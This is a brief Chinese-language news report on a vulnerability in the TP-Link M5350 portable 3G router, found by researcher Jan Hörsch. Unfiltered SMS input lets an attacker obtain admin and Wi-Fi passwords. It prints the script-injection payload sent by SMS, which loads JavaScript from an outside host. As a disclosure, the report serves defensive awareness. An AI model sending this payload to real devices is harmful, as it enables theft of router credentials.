德国安全研究员Jan Hörsch发现,TP-Link M5350路由器存在一枚安全漏洞,向路由器发送短信,它便会将管理员密码、Wi-Fi密码以短信形式回复。

TP-Link M5350,一款便携式3G路由器,支持短信收发功能,但在短信功能位置未做好过滤,以至于产生漏洞。

发送下面这条短信给路由器:

<scriptsrc=//n.ms/a.js></script>

将收到短信回复:

tplinkld